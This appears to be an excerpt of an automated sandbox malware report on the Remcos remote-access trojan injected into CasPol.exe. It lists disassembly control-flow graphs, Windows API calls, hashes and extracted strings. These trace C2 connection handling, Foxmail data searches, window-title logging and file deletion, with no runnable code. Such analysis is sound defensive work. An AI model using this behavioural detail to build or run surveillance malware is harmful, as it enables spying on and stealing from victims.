                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D863
                                                                                                  • Part of subcall function 0040FD92: __EH_prolog.LIBCMT ref: 0040FD97
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: SG$0TG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$PSG$PSG$Remcos Agent initialized$Rmc-ET2B3I$Software\$User$dMG$del$del$exepath$hSG$licence$license_code.txt
                                                                                                • API String ID: 2830904901-3480379099
                                                                                                • Opcode ID: 4837c61dc6344c7a66737fd9b912802572f55baaf40a144d5599f8cf0d738afa
                                                                                                • Instruction ID: b96e9d53b64ce9762df997b7c443b274fb73bccd3fe431706256fac2145036cf
                                                                                                • Opcode Fuzzy Hash: 4837c61dc6344c7a66737fd9b912802572f55baaf40a144d5599f8cf0d738afa
                                                                                                • Instruction Fuzzy Hash: 2E32C760B043406ADA14B776DC57BBE259A9F81748F00483FB9467B2E2DEBC9D44C39E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 496 4140ac-4140f7 call 401faa call 41ac7e call 401faa call 401d64 call 401e8f call 43a7f7 509 414106-414154 call 401f66 call 401d64 call 401fbd call 41b1ce call 404262 call 401d64 call 40b125 496->509 510 4140f9-414100 Sleep 496->510 525 414156-4141c5 call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 509->525 526 4141c8-414262 call 401f66 call 401d64 call 401fbd call 41b1ce call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 509->526 510->509 525->526 579 414272-414279 526->579 580 414264-414270 526->580 581 41427e-41431a call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 414072 579->581 580->581 608 414367-414375 call 4041f1 581->608 609 41431c-414362 WSAGetLastError call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 581->609 614 4143a2-4143b7 call 404915 call 40428c 608->614 615 414377-41439d call 401f66 * 2 call 41a891 608->615 630 414ce6-414cf8 call 4047eb call 4020b4 609->630 614->630 631 4143bd-41450a call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 4 call 41ab78 call 41375b call 4082dc call 440e5e call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 412735 614->631 615->630 645 414d20-414d28 call 401d8c 630->645 646 414cfa-414d1a call 401d64 call 401e8f call 43a7f7 Sleep 630->646 696 41450c-414519 call 40541d 631->696 697 41451e-414545 call 401e8f call 4125eb 631->697 645->526 646->645 696->697 703 414547-414549 697->703 704 41454c-4146b5 call 403b40 call 41aff9 call 40cc9a call 41b0d3 call 40cbf1 call 41aff9 call 41b0d3 call 41af51 call 401d64 GetTickCount call 41af51 call 41aeab call 41af51 * 2 call 41ae5d call 41b0d3 * 5 call 40e751 697->704 703->704 745 4146ba-414c59 call 41b0d3 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 4027cb call 40275c call 4027cb call 40275c call 404468 call 401eea * 54 call 401e13 call 401eea * 7 call 401e13 call 401eea call 401e13 call 4045d5 704->745 978 414c5b-414c62 745->978 979 414c6d-414c74 745->979 978->979 982 414c64-414c66 978->982 980 414c80-414cb2 call 405415 call 401f66 * 2 call 41a891 979->980 981 414c76-414c7b call 40a767 979->981 993 414cb4-414cc0 CreateThread 980->993 994 414cc6-414ce1 call 401eea * 2 call 401e13 980->994 981->980 982->979 993->994 994->630
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,00475308,?,00000000), ref: 00414100
                                                                                                • WSAGetLastError.WS2_32 ref: 00414321
                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00414D1A
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$6.0.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$PhNG$Rmc-ET2B3I$TLS Off$TLS On $dMG$hSG$hlight$name$NG$NG$UG$VG
                                                                                                • API String ID: 524882891-2061636295
                                                                                                • Opcode ID: e721a2e7f7a66eb087c67052235510bbed90ae4c108a4ebd6ee1b6fa55656ae8
                                                                                                • Instruction ID: c3263a97f07b8ae9d11225c8127e62ab27a72c03ae3a8f764161ebb565a1ac44
                                                                                                • Opcode Fuzzy Hash: e721a2e7f7a66eb087c67052235510bbed90ae4c108a4ebd6ee1b6fa55656ae8
                                                                                                • Instruction Fuzzy Hash: EE625E71A001145ACB18F771DDA6AEE73659FA0308F1041BFB80A771E2EF785E85CA9D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1001 411d59-411da2 GetModuleFileNameW call 401faa * 3 1008 411da4-411e2e call 41ad43 call 401e8f call 40c854 call 401eea call 41ad43 call 401e8f call 40c854 call 401eea call 41ad43 call 401e8f call 40c854 call 401eea 1001->1008 1033 411e30-411ec0 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 41789c call 401e13 * 4 1008->1033 1056 411ed0 1033->1056 1057 411ec2-411eca Sleep 1033->1057 1058 411ed2-411f62 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 41789c call 401e13 * 4 1056->1058 1057->1033 1057->1056 1081 411f72 1058->1081 1082 411f64-411f6c Sleep 1058->1082 1083 411f74-412004 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 41789c call 401e13 * 4 1081->1083 1082->1058 1082->1081 1106 412014-412038 1083->1106 1107 412006-41200e Sleep 1083->1107 1108 41203c-412058 call 401e07 call 41b825 1106->1108 1107->1083 1107->1106 1113 41205a-412069 call 401e07 DeleteFileW 1108->1113 1114 41206f-41208b call 401e07 call 41b825 1108->1114 1113->1114 1121 4120a8 1114->1121 1122 41208d-4120a6 call 401e07 DeleteFileW 1114->1122 1124 4120ac-4120c8 call 401e07 call 41b825 1121->1124 1122->1124 1130 4120e2-4120e4 1124->1130 1131 4120ca-4120dc call 401e07 DeleteFileW 1124->1131 1133 4120f1-4120fc Sleep 1130->1133 1134 4120e6-4120e8 1130->1134 1131->1130 1133->1108 1137 412102-412114 call 408339 1133->1137 1134->1133 1136 4120ea-4120ef 1134->1136 1136->1133 1136->1137 1140 412116-412124 call 408339 1137->1140 1141 41216a-412189 call 401e13 * 3 1137->1141 1140->1141 1146 412126-412134 call 408339 1140->1146 1152 41218e-4121f7 call 40b027 call 401e07 call 401fbd call 4124cf call 401e13 call 405422 1141->1152 1146->1141 1153 412136-412162 Sleep call 401e13 * 3 1146->1153 1173 4121fd-412347 call 41b0d3 call 41af51 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1152->1173 1174 41234c-412443 call 41b0d3 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1152->1174 1153->1008 1167 412168 1153->1167 1167->1152 1243 412447-4124b3 call 401eea call 401e13 call 401eea * 8 1173->1243 1174->1243 1275 4124b8-4124ce call 401eea 1243->1275
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411D72
                                                                                                  • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                                                                  • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                                                                  • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                                                                • Sleep.KERNEL32(0000000A,00466324), ref: 00411EC4
                                                                                                • Sleep.KERNEL32(0000000A,00466324,00466324), ref: 00411F66
                                                                                                • Sleep.KERNEL32(0000000A,00466324,00466324,00466324), ref: 00412008
                                                                                                • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 00412069
                                                                                                • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120A0
                                                                                                • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120DC
                                                                                                • Sleep.KERNEL32(000001F4,00466324,00466324,00466324), ref: 004120F6
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412138
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$HTG$HTG$NG$NG
                                                                                                • API String ID: 1223786279-556891652
                                                                                                • Opcode ID: 549b417efc33f3a722c29ae9abd273b4bf21cb01228d4b027d44b743b9cff9db
                                                                                                • Instruction ID: b666a026b41db1aee680f36e7b950d376c2ae40a85d54f66cdb5da2431d4b1f1
                                                                                                • Opcode Fuzzy Hash: 549b417efc33f3a722c29ae9abd273b4bf21cb01228d4b027d44b743b9cff9db
                                                                                                • Instruction Fuzzy Hash: F00224315083414AD324FB61D891BEFB7D5AFD4308F50493EF88A931E2EF785A49C69A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                • API String ID: 672098462-2938083778
                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$<mG$<mG$<mG$]
                                                                                                • API String ID: 911427763-3636820255
                                                                                                • Opcode ID: 701e1abcb342a58bcbd17d29096b7506a1a7cce10c02da9c16591a3cae04d8d9
                                                                                                • Instruction ID: ab9145b4e211f5f3da3af6290e6e7a2c9d96cae7f6b46a2c86e206227f6ebbf0
                                                                                                • Opcode Fuzzy Hash: 701e1abcb342a58bcbd17d29096b7506a1a7cce10c02da9c16591a3cae04d8d9
                                                                                                • Instruction Fuzzy Hash: 1951D0716043409BC324FB25D886AAE7795AF84718F00093FF446A32E2DF7C9E55868F

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1396 40428c-4042ad connect 1397 4043e1-4043e5 1396->1397 1398 4042b3-4042b6 1396->1398 1401 4043e7-4043f5 WSAGetLastError 1397->1401 1402 40445f 1397->1402 1399 4043da-4043dc 1398->1399 1400 4042bc-4042bf 1398->1400 1403 404461-404465 1399->1403 1404 4042c1-4042e8 call 404cbf call 401f66 call 41a891 1400->1404 1405 4042eb-4042f5 call 42035c 1400->1405 1401->1402 1406 4043f7-4043fa 1401->1406 1402->1403 1404->1405 1415 404306-404313 call 42057e 1405->1415 1416 4042f7-404301 1405->1416 1409 404439-40443e 1406->1409 1410 4043fc-404437 call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 1406->1410 1412 404443-40445c call 401f66 * 2 call 41a891 1409->1412 1410->1402 1412->1402 1429 404315-404338 call 401f66 * 2 call 41a891 1415->1429 1430 40434c-404357 call 42113f 1415->1430 1416->1412 1459 40433b-404347 call 42039c 1429->1459 1442 404389-404396 call 4204f5 1430->1442 1443 404359-404387 call 401f66 * 2 call 41a891 call 42079d 1430->1443 1453 404398-4043bb call 401f66 * 2 call 41a891 1442->1453 1454 4043be-4043d7 CreateEventW * 2 1442->1454 1443->1459 1453->1454 1454->1399 1459->1402
                                                                                                APIs
                                                                                                • connect.WS2_32(?,01339ED0,00000010), ref: 004042A5
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 1734d4bcd201993c361aa9c37c64e99c88864a3c423eecac0e64f73a3a30e5ef
                                                                                                • Instruction ID: 8d860672b69a19ae3c360ccb47b0a38bc4e99592ce22fc56bfe6acc5d0e7da0a
                                                                                                • Opcode Fuzzy Hash: 1734d4bcd201993c361aa9c37c64e99c88864a3c423eecac0e64f73a3a30e5ef
                                                                                                • Instruction Fuzzy Hash: D54109B0B0020277CA04B77A884766E7A55AB85314B80012FE901A7AD3FE3DAD2587DF

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 0962e5985aceae85a5c94cde7029e24ad356a8ace8c6bfbca5ef33fdb60659b2
                                                                                                • Instruction ID: bab6184e8302d1d457a53eef1949a11c31841f7ba2aeead181e9cd14b25d2afd
                                                                                                • Opcode Fuzzy Hash: 0962e5985aceae85a5c94cde7029e24ad356a8ace8c6bfbca5ef33fdb60659b2
                                                                                                • Instruction Fuzzy Hash: 21212C71100F149FC6216B26DC05A17BBE1EF40325F104A6EE2A622AF2CF35F851DB4C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1488 40c89e-40c8c3 call 401e52 1491 40c8c9 1488->1491 1492 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cd0a call 402860 * 2 call 401e13 * 5 1488->1492 1494 40c8d0-40c8d5 1491->1494 1495 40c9c2-40c9c7 1491->1495 1496 40c905-40c90a 1491->1496 1497 40c9d8 1491->1497 1498 40c9c9-40c9ce call 43ae1f 1491->1498 1499 40c8da-40c8e8 call 41a956 call 401e18 1491->1499 1500 40c8fb-40c900 1491->1500 1501 40c9bb-40c9c0 1491->1501 1502 40c90f-40c916 call 41b366 1491->1502 1504 40c9dd-40c9e2 call 43ae1f 1494->1504 1495->1504 1496->1504 1497->1504 1512 40c9d3-40c9d6 1498->1512 1519 40c8ed 1499->1519 1500->1504 1501->1504 1516 40c918-40c968 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1502->1516 1517 40c96a-40c9b6 call 403b40 call 43ae1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1502->1517 1518 40c9e3-40c9e8 call 4082d7 1504->1518 1512->1497 1512->1518 1524 40c8f1-40c8f6 call 401e13 1516->1524 1517->1519 1518->1492 1519->1524 1524->1492
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: 8058316647152c20abd1cdabdfa83951e42b6909899b53d80ef63206f3cf228c
                                                                                                • Instruction ID: f058a63a2e06dcb2b247864a9289bab0e783a4957c20bc3838a58b63f1508e50
                                                                                                • Opcode Fuzzy Hash: 8058316647152c20abd1cdabdfa83951e42b6909899b53d80ef63206f3cf228c
                                                                                                • Instruction Fuzzy Hash: F0415C721482009AC214F721DC97DAFB7A4AE90759F10063FF546720E2EE7CAA59C69F

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                  • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: PSG$PSG
                                                                                                • API String ID: 3795512280-3836871860
                                                                                                • Opcode ID: f6877cb72887f59373030f821c6bbb2fb3a04d659d024267e718477402eb9191
                                                                                                • Instruction ID: 2e46ee78bd67d64478951c63fc585b7447d0c94e1b250d5b4a4871e09aa14890
                                                                                                • Opcode Fuzzy Hash: f6877cb72887f59373030f821c6bbb2fb3a04d659d024267e718477402eb9191
                                                                                                • Instruction Fuzzy Hash: 68517F716043005ACB05BB71C866ABF779AAF81309F00453FF886B71E2DE7D9D45C69A

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                                                                  • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                                                                  • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                                                                  • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                                                                  • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                                                                • StrToIntA.SHLWAPI(00000000,0046CC58,?,00000000,00000000,004750FC,00000003,Exe,00000000,0000000E,00000000,0046656C,00000003,00000000), ref: 0041A6E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
